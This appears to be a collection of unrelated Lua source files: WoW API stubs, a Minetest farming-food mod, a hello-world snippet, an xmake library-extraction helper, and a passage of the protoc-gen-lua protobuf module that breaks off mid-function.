---[Documentation](https://wow.gamepedia.com/API_GetLFGProposalEncounter)
function GetLFGProposalEncounter(encounterIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGProposalMember)
function GetLFGProposalMember(memberIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGQueueStats)
function GetLFGQueueStats(category, lfgID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGQueuedList)
function GetLFGQueuedList(category, table) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGRandomCooldownExpiration)
function GetLFGRandomCooldownExpiration() end
---[Documentation](https://wow.gamepedia.com/API_GetLFGRandomDungeonInfo)
function GetLFGRandomDungeonInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGReadyCheckUpdate)
function GetLFGReadyCheckUpdate() end
---[Documentation](https://wow.gamepedia.com/API_GetLFGReadyCheckUpdateBattlegroundInfo)
function GetLFGReadyCheckUpdateBattlegroundInfo() end
---@param dungeonID number
---@param shortageSeverity number
---@return boolean eligible
---@return boolean forTank
---@return boolean forHealer
---@return boolean forDamage
---@return number itemCount
---@return number money
---@return number xp
---[Documentation](https://wow.gamepedia.com/API_GetLFGRoleShortageRewards)
function GetLFGRoleShortageRewards(dungeonID, shortageSeverity) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGRoleUpdate)
function GetLFGRoleUpdate() end
---@return string queueName
---[Documentation](https://wow.gamepedia.com/API_GetLFGRoleUpdateBattlegroundInfo)
function GetLFGRoleUpdateBattlegroundInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetLFGRoleUpdateMember)
function GetLFGRoleUpdateMember(memberIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGRoleUpdateSlot)
function GetLFGRoleUpdateSlot(slotIndex) end
---@return boolean isLeader
---@return boolean isTank
---@return boolean isHealer
---@return boolean isDPS
---[Documentation](https://wow.gamepedia.com/API_GetLFGRoles)
function GetLFGRoles() end
---[Documentation](https://wow.gamepedia.com/API_GetLFGSuspendedPlayers)
function GetLFGSuspendedPlayers(category) end
---@param LFRRaidList table
---@return table raidList
---[Documentation](https://wow.gamepedia.com/API_GetLFRChoiceOrder)
function GetLFRChoiceOrder(LFRRaidList) end
---[Documentation](https://wow.gamepedia.com/API_GetLanguageByIndex)
function GetLanguageByIndex(index) end
---[Documentation](https://wow.gamepedia.com/API_GetLatestCompletedAchievements)
function GetLatestCompletedAchievements() end
---[Documentation](https://wow.gamepedia.com/API_GetLatestCompletedComparisonAchievements)
function GetLatestCompletedComparisonAchievements() end
---[Documentation](https://wow.gamepedia.com/API_GetLatestThreeSenders)
function GetLatestThreeSenders() end
---[Documentation](https://wow.gamepedia.com/API_GetLatestUpdatedComparisonStats)
function GetLatestUpdatedComparisonStats() end
---[Documentation](https://wow.gamepedia.com/API_GetLatestUpdatedStats)
function GetLatestUpdatedStats() end
---[Documentation](https://wow.gamepedia.com/API_GetLegacyRaidDifficultyID)
function GetLegacyRaidDifficultyID() end
---[Documentation](https://wow.gamepedia.com/API_GetLevelUpInstances)
function GetLevelUpInstances(level, isRaid) end
---[Documentation](https://wow.gamepedia.com/API_GetLifesteal)
function GetLifesteal() end
---[Documentation](https://wow.gamepedia.com/API_GetLocalGameTime)
function GetLocalGameTime() end
---[Documentation](https://wow.gamepedia.com/API_GetLocale)
function GetLocale() end
---[Documentation](https://wow.gamepedia.com/API_GetLookingForGuildComment)
function GetLookingForGuildComment() end
---[Documentation](https://wow.gamepedia.com/API_GetLookingForGuildSettings)
function GetLookingForGuildSettings() end
---[Documentation](https://wow.gamepedia.com/API_GetLooseMacroIcons)
function GetLooseMacroIcons() end
---[Documentation](https://wow.gamepedia.com/API_GetLooseMacroItemIcons)
function GetLooseMacroItemIcons() end
---[Documentation](https://wow.gamepedia.com/API_GetLootInfo)
function GetLootInfo() end
---@return string lootmethod
---@return number masterlooterPartyID
---@return number masterlooterRaidID
---[Documentation](https://wow.gamepedia.com/API_GetLootMethod)
function GetLootMethod() end
---[Documentation](https://wow.gamepedia.com/API_GetLootRollItemInfo)
function GetLootRollItemInfo(rollId) end
---[Documentation](https://wow.gamepedia.com/API_GetLootRollItemLink)
function GetLootRollItemLink(id) end
---[Documentation](https://wow.gamepedia.com/API_GetLootRollTimeLeft)
function GetLootRollTimeLeft(rollid) end
---[Documentation](https://wow.gamepedia.com/API_GetLootSlotInfo)
function GetLootSlotInfo(slot) end
---@param index number
---@return string itemLink
---[Documentation](https://wow.gamepedia.com/API_GetLootSlotLink)
function GetLootSlotLink(index) end
---@param slotIndex number
---@return number slotType
---[Documentation](https://wow.gamepedia.com/API_GetLootSlotType)
function GetLootSlotType(slotIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLootSourceInfo)
function GetLootSourceInfo(slot) end
---@return number specID
---[Documentation](https://wow.gamepedia.com/API_GetLootSpecialization)
function GetLootSpecialization() end
---@return number threshold
---[Documentation](https://wow.gamepedia.com/API_GetLootThreshold)
function GetLootThreshold() end
---[Documentation](https://wow.gamepedia.com/API_GetMacroBody)
function GetMacroBody() end
---[Documentation](https://wow.gamepedia.com/API_GetMacroIcons)
function GetMacroIcons(table) end
---@param name string
---@return number macroSlot
---[Documentation](https://wow.gamepedia.com/API_GetMacroIndexByName)
function GetMacroIndexByName(name) end
---[Documentation](https://wow.gamepedia.com/API_GetMacroInfo)
function GetMacroInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetMacroItem)
function GetMacroItem() end
---[Documentation](https://wow.gamepedia.com/API_GetMacroItemIcons)
function GetMacroItemIcons(table) end
---[Documentation](https://wow.gamepedia.com/API_GetMacroSpell)
function GetMacroSpell() end
---@return number base
---@return number casting
---[Documentation](https://wow.gamepedia.com/API_GetManaRegen)
function GetManaRegen() end
---[Documentation](https://wow.gamepedia.com/API_GetMasterLootCandidate)
function GetMasterLootCandidate(index) end
---@return number mastery
---[Documentation](https://wow.gamepedia.com/API_GetMastery)
function GetMastery() end
---@return number mastery
---@return number coefficient
---[Documentation](https://wow.gamepedia.com/API_GetMasteryEffect)
function GetMasteryEffect() end
---[Documentation](https://wow.gamepedia.com/API_GetMawPowerLinkBySpellID)
function GetMawPowerLinkBySpellID(spellID) end
---[Documentation](https://wow.gamepedia.com/API_GetMaxArenaCurrency)
function GetMaxArenaCurrency() end
---@return number maxBattlefieldID
---[Documentation](https://wow.gamepedia.com/API_GetMaxBattlefieldID)
function GetMaxBattlefieldID() end
---[Documentation](https://wow.gamepedia.com/API_GetMaxCombatRatingBonus)
function GetMaxCombatRatingBonus(ratingIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetMaxNumCUFProfiles)
function GetMaxNumCUFProfiles() end
---[Documentation](https://wow.gamepedia.com/API_GetMaxPlayerLevel)
function GetMaxPlayerLevel() end
---[Documentation](https://wow.gamepedia.com/API_GetMaxRenderScale)
function GetMaxRenderScale() end
---[Documentation](https://wow.gamepedia.com/API_GetMaxRewardCurrencies)
function GetMaxRewardCurrencies() end
---[Documentation](https://wow.gamepedia.com/API_GetMaxSpellStartRecoveryOffset)
function GetMaxSpellStartRecoveryOffset() end
---@return number tiers
---[Documentation](https://wow.gamepedia.com/API_GetMaxTalentTier)
function GetMaxTalentTier() end
---[Documentation](https://wow.gamepedia.com/API_GetMeleeHaste)
function GetMeleeHaste() end
---[Documentation](https://wow.gamepedia.com/API_GetMerchantCurrencies)
function GetMerchantCurrencies() end
---[Documentation](https://wow.gamepedia.com/API_GetMerchantFilter)
function GetMerchantFilter() end
---@param index number
---@return number itemCount
---[Documentation](https://wow.gamepedia.com/API_GetMerchantItemCostInfo)
function GetMerchantItemCostInfo(index) end
---@param index number
---@param itemIndex number
---@return string itemTexture
---@return number itemValue
---@return string itemLink
---@return string currencyName
---[Documentation](https://wow.gamepedia.com/API_GetMerchantItemCostItem)
function GetMerchantItemCostItem(index, itemIndex) end
|
local S = farming_craft.intllib
local modlist=minetest.get_modnames()
--= Sugar
minetest.register_craftitem(":farming:sugar", {
description = S("Sugar"),
inventory_image = "farming_sugar.png",
groups = {food_sugar = 1, flammable = 3},
})
minetest.register_craft({
type = "cooking",
cooktime = 3,
output = "farming:sugar 2",
recipe = "default:papyrus",
})
minetest.register_craft({
type = "cooking",
cooktime = 2,
output = "farming:sugar 3",
recipe = "farming:sugarbeet_seed",
})
--= Salt
minetest.register_node(":farming:salt", {
description = S("Salt"),
inventory_image = "farming_salt.png",
wield_image = "farming_salt.png",
drawtype = "plantlike",
visual_scale = 0.8,
paramtype = "light",
tiles = {"farming_salt.png"},
groups = {food_salt = 1, vessel = 1, dig_immediate = 3,
attached_node = 1},
sounds = default.node_sound_defaults(),
selection_box = {
type = "fixed",
fixed = {-0.25, -0.5, -0.25, 0.25, 0.3, 0.25}
},
})
minetest.register_craft({
type = "cooking",
cooktime = 15,
output = "farming:salt",
recipe = "bucket:bucket_water",
replacements = {{"bucket:bucket_water", "bucket:bucket_empty"}}
})
--= Rose Water
minetest.register_node(":farming:rose_water", {
description = S("Rose Water"),
inventory_image = "farming_rose_water.png",
wield_image = "farming_rose_water.png",
drawtype = "plantlike",
visual_scale = 0.8,
paramtype = "light",
tiles = {"farming_rose_water.png"},
groups = {food_rose_water = 1, vessel = 1, dig_immediate = 3,
attached_node = 1},
sounds = default.node_sound_defaults(),
selection_box = {
type = "fixed",
fixed = {-0.25, -0.5, -0.25, 0.25, 0.3, 0.25}
},
})
minetest.register_craft({
output = "farming:rose_water",
recipe = {
{"flowers:rose", "flowers:rose", "flowers:rose"},
{"flowers:rose", "flowers:rose", "flowers:rose"},
{"bucket:bucket_water", "group:food_pot", "vessels:glass_bottle"},
},
replacements = {
{"bucket:bucket_water", "bucket:bucket_empty"},
{"group:food_pot", "farming:pot"},
}
})
--= Turkish Delight
minetest.register_craftitem(":farming:turkish_delight", {
description = S("Turkish Delight"),
inventory_image = "farming_turkish_delight.png",
groups = {flammable = 3},
on_use = minetest.item_eat(2),
})
minetest.register_craft({
output = "farming:turkish_delight 4",
recipe = {
{"group:food_gelatin", "group:food_sugar", "group:food_gelatin"},
{"group:food_sugar", "group:food_rose_water", "group:food_sugar"},
{"group:food_cornstarch", "group:food_sugar", "dye:pink"},
},
replacements = {
{"group:food_cornstarch", "farming:bowl"},
{"group:food_rose_water", "vessels:glass_bottle"},
},
})
--= Garlic Bread
minetest.register_craftitem(":farming:garlic_bread", {
description = S("Garlic Bread"),
inventory_image = "farming_garlic_bread.png",
groups = {flammable = 3},
on_use = minetest.item_eat(2),
})
minetest.register_craft({
type = "shapeless",
output = "farming:garlic_bread",
recipe = {"group:food_toast", "group:food_garlic_clove", "group:food_garlic_clove"},
})
--= Donuts (thanks to Bockwurst for making the donut images)
minetest.register_craftitem(":farming:donut", {
description = S("Donut"),
inventory_image = "farming_donut.png",
on_use = minetest.item_eat(4),
})
minetest.register_craft({
output = "farming:donut 3",
recipe = {
{"", "group:food_wheat", ""},
{"group:food_wheat", "group:food_sugar", "group:food_wheat"},
{"", "group:food_wheat", ""},
}
})
minetest.register_craftitem(":farming:donut_chocolate", {
description = S("Chocolate Donut"),
inventory_image = "farming_donut_chocolate.png",
on_use = minetest.item_eat(6),
})
minetest.register_craft({
output = "farming:donut_chocolate",
recipe = {
{'group:food_cocoa'},
{'farming:donut'},
}
})
minetest.register_craftitem(":farming:donut_apple", {
description = S("Apple Donut"),
inventory_image = "farming_donut_apple.png",
on_use = minetest.item_eat(6),
})
minetest.register_craft({
output = "farming:donut_apple",
recipe = {
{'default:apple'},
{'farming:donut'},
}
})
--= Porridge Oats
minetest.register_craftitem(":farming:porridge", {
description = S("Porridge"),
inventory_image = "farming_porridge.png",
on_use = minetest.item_eat(6, "farming:bowl"),
})
minetest.after(0, function()
local fluid = "bucket:bucket_water"
local fluid_return = "bucket:bucket_water"
if minetest.get_modpath("mobs") and mobs and mobs.mod == "redo" then
fluid = "group:food_milk"
fluid_return = "mobs:bucket_milk"
end
minetest.register_craft({
type = "shapeless",
output = "farming:porridge",
recipe = {
"group:food_barley", "group:food_barley", "group:food_wheat",
"group:food_wheat", "group:food_bowl", fluid
},
replacements = {{fluid_return, "bucket:bucket_empty"}}
})
end)
minetest.register_craftitem(":farming:bread", {
description = S("Bread"),
inventory_image = "farming_bread.png",
on_use = minetest.item_eat(5),
groups = {food_bread = 1, flammable = 2},
})
minetest.register_craft({
type = "cooking",
cooktime = 15,
output = "farming:bread",
recipe = "farming:flour"
})
if basic_functions.has_value(modlist,"vessels") and basic_functions.has_value(modlist,"bucket") then
minetest.register_craft( {
output = ":farming:grain_coffee_cup 3",
type = "shapeless",
recipe = {"vessels:drinking_glass","vessels:drinking_glass","vessels:drinking_glass", "group:food_grain_powder",
"bucket:bucket_water"},
replacements = {
{"bucket:bucket_water", "bucket:bucket_empty"},
}
})
minetest.register_craft( {
output = ":farming:coffee_cup",
type = "shapeless",
recipe = {"vessels:drinking_glass", "group:food_powder",
"bucket:bucket_water"},
replacements = {
{"bucket:bucket_water", "bucket:bucket_empty"},
}
})
minetest.register_craftitem(":farming:grain_coffee_cup", {
description = S("Grain Coffee"),
inventory_image = "farming_coffee_cup.png",
on_use = minetest.item_eat(2,"vessels:drinking_glass"),
groups = {coffee = 1, flammable = 1, beverage=1},
})
minetest.register_craftitem(":farming:grain_coffee_cup_hot", {
description = S("Grain Coffee hot"),
inventory_image = "farming_coffee_cup_hot.png",
on_use = minetest.item_eat(4,"vessels:drinking_glass"),
groups = {coffee = 2, flammable = 1, beverage=2},
})
minetest.register_craft({
type = "cooking",
cooktime = 2,
output = "farming:grain_coffee_cup_hot",
recipe = "farming:grain_coffee_cup"
})
minetest.register_craftitem(":farming:grain_milk", {
description = S("Grain Milk"),
inventory_image = "farming_grain_milk.png",
on_use = minetest.item_eat(5,"vessels:drinking_glass"),
groups = {flammable = 1, beverage=1},
})
minetest.register_craft( {
output = ":farming:grain_milk 3",
type = "shapeless",
recipe = {"vessels:drinking_glass","vessels:drinking_glass","vessels:drinking_glass", "farming:flour",
"bucket:bucket_water"},
replacements = {
{"bucket:bucket_water", "bucket:bucket_empty"},
}
})
else
print("Mod vessels/bucket not available. Seriously? -> no COFFEE!")
end
if basic_functions.has_value(modlist,"wool") then
minetest.register_craft({
output="wool:white",
type="shapeless",
recipe={"farming:cotton","farming:cotton","farming:cotton","farming:cotton"},
})
minetest.register_craft({
output="wool:dark_green",
type="shapeless",
recipe={"farming:nettle_fibre","farming:nettle_fibre","farming:nettle_fibre","farming:nettle_fibre"},
})
minetest.register_craft({
output="wool:dark_green",
type="shapeless",
recipe={"farming:hemp_fibre","farming:hemp_fibre","farming:hemp_fibre","farming:hemp_fibre"},
})
end
--copied from farming_mod
-- sliced bread
minetest.register_craftitem(":farming:bread_slice", {
description = S("Sliced Bread"),
inventory_image = "farming_bread_slice.png",
on_use = minetest.item_eat(1),
groups = {food_bread_slice = 1, flammable = 2},
})
minetest.register_craft({
type = "shapeless",
output = "farming:bread_slice 5",
recipe = {"farming:bread", "group:food_cutting_board"},
replacements = {{"group:food_cutting_board", "farming:cutting_board"}},
})
-- toast
minetest.register_craftitem(":farming:toast", {
description = S("Toast"),
inventory_image = "farming_toast.png",
on_use = minetest.item_eat(1),
groups = {food_toast = 1, flammable = 2},
})
minetest.register_craft({
type = "cooking",
cooktime = 3,
output = "farming:toast",
recipe = "farming:bread_slice"
})
-- toast sandwich
minetest.register_craftitem(":farming:toast_sandwich", {
description = S("Toast Sandwich"),
inventory_image = "farming_toast_sandwich.png",
on_use = minetest.item_eat(4),
groups = {flammable = 2},
})
minetest.register_craft({
output = "farming:toast_sandwich",
recipe = {
{"farming:bread_slice"},
{"farming:toast"},
{"farming:bread_slice"},
}
})
minetest.register_craftitem(":farming:smoothie", {
description = S("Smoothie"),
inventory_image = "farming_smoothie.png",
groups = {flammable = 3},
drink_hp=10,
on_use = minetest.item_eat(2),
})
minetest.register_craft({
type = "shapeless",
output = "farming:smoothie 3",
recipe = {"vessels:drinking_glass","vessels:drinking_glass","vessels:drinking_glass", "farming:blueberry_seed",
"farming:strawberry_seed","farming:raspberry_seed"},
})
|
-- Code here
io.write("What's your name? ")
name = io.read()
print("Hello "..name.."!")
|
--!A cross-platform build utility based on Lua
--
-- Licensed under the Apache License, Version 2.0 (the "License");
-- you may not use this file except in compliance with the License.
-- You may obtain a copy of the License at
--
-- http://www.apache.org/licenses/LICENSE-2.0
--
-- Unless required by applicable law or agreed to in writing, software
-- distributed under the License is distributed on an "AS IS" BASIS,
-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-- See the License for the specific language governing permissions and
-- limitations under the License.
--
-- Copyright (C) 2015 - 2019, TBOOX Open Source Group.
--
-- @author ruki
-- @file lib.lua
--
-- imports
import("private.tools.vstool")
-- extract the static library to object directory
function extract(self, libraryfile, objectdir)
-- make the object directory first
os.mkdir(objectdir)
-- list object files
local objectfiles = vstool.iorunv(self:program(), {"-nologo", "-list", libraryfile})
-- extrace all object files
for _, objectfile in ipairs(objectfiles:split('\n')) do
-- is object file?
if objectfile:find("%.obj") then
-- make the outputfile
local outputfile = path.translate(format("%s\\%s", objectdir, path.filename(objectfile)))
-- repeat? rename it
if os.isfile(outputfile) then
for i = 0, 10 do
outputfile = path.translate(format("%s\\%d_%s", objectdir, i, path.filename(objectfile)))
if not os.isfile(outputfile) then
break
end
end
end
-- extract it
vstool.runv(self:program(), {"-nologo", "-extract:" .. objectfile, "-out:" .. outputfile, libraryfile})
end
end
end
|
--
--------------------------------------------------------------------------------
-- FILE: protobuf.lua
-- DESCRIPTION: protoc-gen-lua
-- Google's Protocol Buffers project, ported to lua.
-- https://code.google.com/p/protoc-gen-lua/
--
-- Copyright (c) 2010 , 林卓毅 (Zhuoyi Lin) [email protected]
-- All rights reserved.
--
-- Use, modification and distribution are subject to the "New BSD License"
-- as listed at <url: http://www.opensource.org/licenses/bsd-license.php >.
--
-- COMPANY: NetEase
-- CREATED: 2010年07月29日 14时30分02秒 CST
--------------------------------------------------------------------------------
--
local pb = require "pb"
local wire_format = require "protobuf.wire_format"
local type_checkers = require "protobuf.type_checkers"
local encoder = require "protobuf.encoder"
local decoder = require "protobuf.decoder"
local listener_mod = require "protobuf.listener"
local containers = require "protobuf.containers"
local descriptor = require "protobuf.descriptor"
local FieldDescriptor = descriptor.FieldDescriptor
local text_format = require "protobuf.text_format"
local registry = require "protobuf.registry"
local struct = require "protobuf.struct"
local protobuf = {}
local NON_PACKABLE_TYPES = {
[FieldDescriptor.TYPE_STRING] = true,
[FieldDescriptor.TYPE_GROUP] = true,
[FieldDescriptor.TYPE_MESSAGE] = true,
[FieldDescriptor.TYPE_BYTES] = true
}
local _VALUE_CHECKERS = {
[FieldDescriptor.CPPTYPE_INT32] = type_checkers.Int32ValueChecker(),
[FieldDescriptor.CPPTYPE_INT64] = type_checkers.TypeChecker({string = true, number = true}),
[FieldDescriptor.CPPTYPE_UINT32] = type_checkers.Uint32ValueChecker(),
[FieldDescriptor.CPPTYPE_UINT64] = type_checkers.TypeChecker({string = true, number = true}),
[FieldDescriptor.CPPTYPE_DOUBLE] = type_checkers.TypeChecker({number = true}),
[FieldDescriptor.CPPTYPE_FLOAT] = type_checkers.TypeChecker({number = true}),
[FieldDescriptor.CPPTYPE_BOOL] = type_checkers.TypeChecker({boolean = true, bool = true, int=true}),
[FieldDescriptor.CPPTYPE_ENUM] = type_checkers.Int32ValueChecker(),
[FieldDescriptor.CPPTYPE_STRING] = type_checkers.TypeChecker({string = true})
}
local TYPE_TO_ENCODER = {
[FieldDescriptor.TYPE_DOUBLE] = encoder.DoubleEncoder,
[FieldDescriptor.TYPE_FLOAT] = encoder.FloatEncoder,
[FieldDescriptor.TYPE_INT64] = encoder.Int64Encoder,
[FieldDescriptor.TYPE_UINT64] = encoder.UInt64Encoder,
[FieldDescriptor.TYPE_INT32] = encoder.Int32Encoder,
[FieldDescriptor.TYPE_FIXED64] = encoder.Fixed64Encoder,
[FieldDescriptor.TYPE_FIXED32] = encoder.Fixed32Encoder,
[FieldDescriptor.TYPE_BOOL] = encoder.BoolEncoder,
[FieldDescriptor.TYPE_STRING] = encoder.StringEncoder,
[FieldDescriptor.TYPE_GROUP] = encoder.GroupEncoder,
[FieldDescriptor.TYPE_MESSAGE] = encoder.MessageEncoder,
[FieldDescriptor.TYPE_BYTES] = encoder.BytesEncoder,
[FieldDescriptor.TYPE_UINT32] = encoder.UInt32Encoder,
[FieldDescriptor.TYPE_ENUM] = encoder.EnumEncoder,
[FieldDescriptor.TYPE_SFIXED32] = encoder.SFixed32Encoder,
[FieldDescriptor.TYPE_SFIXED64] = encoder.SFixed64Encoder,
[FieldDescriptor.TYPE_SINT32] = encoder.SInt32Encoder,
[FieldDescriptor.TYPE_SINT64] = encoder.SInt64Encoder
}
local TYPE_TO_SIZER = {
[FieldDescriptor.TYPE_DOUBLE] = encoder.DoubleSizer,
[FieldDescriptor.TYPE_FLOAT] = encoder.FloatSizer,
[FieldDescriptor.TYPE_INT64] = encoder.Int64Sizer,
[FieldDescriptor.TYPE_UINT64] = encoder.UInt64Sizer,
[FieldDescriptor.TYPE_INT32] = encoder.Int32Sizer,
[FieldDescriptor.TYPE_FIXED64] = encoder.Fixed64Sizer,
[FieldDescriptor.TYPE_FIXED32] = encoder.Fixed32Sizer,
[FieldDescriptor.TYPE_BOOL] = encoder.BoolSizer,
[FieldDescriptor.TYPE_STRING] = encoder.StringSizer,
[FieldDescriptor.TYPE_GROUP] = encoder.GroupSizer,
[FieldDescriptor.TYPE_MESSAGE] = encoder.MessageSizer,
[FieldDescriptor.TYPE_BYTES] = encoder.BytesSizer,
[FieldDescriptor.TYPE_UINT32] = encoder.UInt32Sizer,
[FieldDescriptor.TYPE_ENUM] = encoder.EnumSizer,
[FieldDescriptor.TYPE_SFIXED32] = encoder.SFixed32Sizer,
[FieldDescriptor.TYPE_SFIXED64] = encoder.SFixed64Sizer,
[FieldDescriptor.TYPE_SINT32] = encoder.SInt32Sizer,
[FieldDescriptor.TYPE_SINT64] = encoder.SInt64Sizer
}
local TYPE_TO_DECODER = {
[FieldDescriptor.TYPE_DOUBLE] = decoder.DoubleDecoder,
[FieldDescriptor.TYPE_FLOAT] = decoder.FloatDecoder,
[FieldDescriptor.TYPE_INT64] = decoder.Int64Decoder,
[FieldDescriptor.TYPE_UINT64] = decoder.UInt64Decoder,
[FieldDescriptor.TYPE_INT32] = decoder.Int32Decoder,
[FieldDescriptor.TYPE_FIXED64] = decoder.Fixed64Decoder,
[FieldDescriptor.TYPE_FIXED32] = decoder.Fixed32Decoder,
[FieldDescriptor.TYPE_BOOL] = decoder.BoolDecoder,
[FieldDescriptor.TYPE_STRING] = decoder.StringDecoder,
[FieldDescriptor.TYPE_GROUP] = decoder.GroupDecoder,
[FieldDescriptor.TYPE_MESSAGE] = decoder.MessageDecoder,
[FieldDescriptor.TYPE_BYTES] = decoder.BytesDecoder,
[FieldDescriptor.TYPE_UINT32] = decoder.UInt32Decoder,
[FieldDescriptor.TYPE_ENUM] = decoder.EnumDecoder,
[FieldDescriptor.TYPE_SFIXED32] = decoder.SFixed32Decoder,
[FieldDescriptor.TYPE_SFIXED64] = decoder.SFixed64Decoder,
[FieldDescriptor.TYPE_SINT32] = decoder.SInt32Decoder,
[FieldDescriptor.TYPE_SINT64] = decoder.SInt64Decoder
}
local FIELD_TYPE_TO_WIRE_TYPE = {
[FieldDescriptor.TYPE_DOUBLE] = wire_format.WIRETYPE_FIXED64,
[FieldDescriptor.TYPE_FLOAT] = wire_format.WIRETYPE_FIXED32,
[FieldDescriptor.TYPE_INT64] = wire_format.WIRETYPE_VARINT,
[FieldDescriptor.TYPE_UINT64] = wire_format.WIRETYPE_VARINT,
[FieldDescriptor.TYPE_INT32] = wire_format.WIRETYPE_VARINT,
[FieldDescriptor.TYPE_FIXED64] = wire_format.WIRETYPE_FIXED64,
[FieldDescriptor.TYPE_FIXED32] = wire_format.WIRETYPE_FIXED32,
[FieldDescriptor.TYPE_BOOL] = wire_format.WIRETYPE_VARINT,
[FieldDescriptor.TYPE_STRING] = wire_format.WIRETYPE_LENGTH_DELIMITED,
[FieldDescriptor.TYPE_GROUP] = wire_format.WIRETYPE_START_GROUP,
[FieldDescriptor.TYPE_MESSAGE] = wire_format.WIRETYPE_LENGTH_DELIMITED,
[FieldDescriptor.TYPE_BYTES] = wire_format.WIRETYPE_LENGTH_DELIMITED,
[FieldDescriptor.TYPE_UINT32] = wire_format.WIRETYPE_VARINT,
[FieldDescriptor.TYPE_ENUM] = wire_format.WIRETYPE_VARINT,
[FieldDescriptor.TYPE_SFIXED32] = wire_format.WIRETYPE_FIXED32,
[FieldDescriptor.TYPE_SFIXED64] = wire_format.WIRETYPE_FIXED64,
[FieldDescriptor.TYPE_SINT32] = wire_format.WIRETYPE_VARINT,
[FieldDescriptor.TYPE_SINT64] = wire_format.WIRETYPE_VARINT
}
local function IsTypePackable(field_type)
return NON_PACKABLE_TYPES[field_type] == nil
end
local function GetTypeChecker(cpp_type, field_type)
if (cpp_type == FieldDescriptor.CPPTYPE_STRING and field_type == FieldDescriptor.TYPE_STRING) then
return type_checkers.UnicodeValueChecker()
end
return _VALUE_CHECKERS[cpp_type]
end
local function _DefaultValueConstructorForField(field)
if field.label == FieldDescriptor.LABEL_REPEATED then
if type(field.default_value) ~= "table" or #(field.default_value) ~= 0 then
error('Repeated field default value not empty list:' .. tostring(field.default_value))
end
if field.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE then
local message_type = field.message_type
return function (message)
return containers.RepeatedCompositeFieldContainer(message._listener_for_children, message_type)
end
else
local type_checker = GetTypeChecker(field.cpp_type, field.type)
return function (message)
return containers.RepeatedScalarFieldContainer(message._listener_for_children, type_checker)
end
end
end
if field.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE then
local message_type = field.message_type
return function (message)
result = message_type._concrete_class()
result._SetListener(message._listener_for_children)
return result
end
end
return function (message)
return field.default_value
end
end
local function _AddPropertiesForRepeatedField(field, message_meta)
local property_name = field.name
message_meta._getter[property_name] = function(self)
local field_value = self._fields[field]
if field_value == nil then
field_value = field._default_constructor(self)
self._fields[field] = field_value
if not self._cached_byte_size_dirty then
message_meta._member._Modified(self)
end
end
return field_value
end
message_meta._setter[property_name] = function(self)
error('Assignment not allowed to repeated field "' .. property_name .. '" in protocol message object.')
end
end
local function _AddPropertiesForNonRepeatedCompositeField(field, message_meta)
local property_name = field.name
local message_type = field.message_type
message_meta._getter[property_name] = function(self)
local field_value = self._fields[field]
if field_value == nil then
field_value = message_type._concrete_class()
field_value:_SetListener(self._listener_for_children)
self._fields[field] = field_value
if not self._cached_byte_size_dirty then
message_meta._member._Modified(self)
end
end
return field_value
end
message_meta._setter[property_name] = function(self, new_value)
error('Assignment not allowed to composite field' .. property_name .. 'in protocol message object.' )
end
end
local function _AddPropertiesForNonRepeatedScalarField(field, message)
local property_name = field.name
local type_checker = GetTypeChecker(field.cpp_type, field.type)
local default_value = field.default_value
message._getter[property_name] = function(self)
local value = self._fields[field]
if value ~= nil then
return self._fields[field]
else
return default_value
end
end
message._setter[property_name] = function(self, new_value)
type_checker(new_value)
self._fields[field] = new_value
if not self._cached_byte_size_dirty then
message._member._Modified(self)
end
end
end
local function _AddPropertiesForField(field, message_meta)
constant_name = field.name:upper() .. "_FIELD_NUMBER"
message_meta._member[constant_name] = field.number
if field.label == FieldDescriptor.LABEL_REPEATED then
_AddPropertiesForRepeatedField(field, message_meta)
elseif field.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE then
_AddPropertiesForNonRepeatedCompositeField(field, message_meta)
else
_AddPropertiesForNonRepeatedScalarField(field, message_meta)
end
end
local _ED_meta = {
__index = function(self, extension_handle)
local _extended_message = rawget(self, "_extended_message")
local value = _extended_message._fields[extension_handle]
if value ~= nil then
return value
end
if extension_handle.label == FieldDescriptor.LABEL_REPEATED then
value = extension_handle._default_constructor(self._extended_message)
elseif extension_handle.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE then
value = extension_handle.message_type._concrete_class()
value:_SetListener(_extended_message._listener_for_children)
else
return extension_handle.default_value
end
_extended_message._fields[extension_handle] = value
return value
end,
__newindex = function(self, extension_handle, value)
local _extended_message = rawget(self, "_extended_message")
if (extension_handle.label == FieldDescriptor.LABEL_REPEATED or
extension_handle.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE) then
error('Cannot assign to extension "'.. extension_handle.full_name .. '" because it is a repeated or composite type.')
end
local type_checker = GetTypeChecker(extension_handle.cpp_type, extension_handle.type)
type_checker.CheckValue(value)
_extended_message._fields[extension_handle] = value
_extended_message._Modified()
end
}
local function _ExtensionDict(message)
local o = {}
o._extended_message = message
return setmetatable(o, _ED_meta)
end
local function _AddPropertiesForFields(descriptor, message_meta)
for _, field in ipairs(descriptor.fields) do
_AddPropertiesForField(field, message_meta)
end
if descriptor.is_extendable then
message_meta._getter.Extensions = function(self) return _ExtensionDict(self) end
end
end
local function _AddPropertiesForExtensions(descriptor, message_meta)
local extension_dict = descriptor._extensions_by_name
for extension_name, extension_field in pairs(extension_dict) do
local constant_name = string.upper(extension_name) .. "_FIELD_NUMBER"
message_meta._member[constant_name] = extension_field.number
end
end
local function _AddStaticMethods(message_meta)
message_meta._member.RegisterExtension = function(extension_handle)
extension_handle.containing_type = message_meta._descriptor
_AttachFieldHelpers(message_meta, extension_handle)
if message_meta._extensions_by_number[extension_handle.number] == nil then
message_meta._extensions_by_number[extension_handle.number] = extension_handle
else
error(
string.format('Extensions "%s" and "%s" both try to extend message type "%s" with field number %d.',
extension_handle.full_name, actual_handle.full_name,
message_meta._descriptor.full_name, extension_handle.number))
end
message_meta._extensions_by_name[extension_handle.full_name] = extension_handle
end
message_meta._member.FromString = function(s)
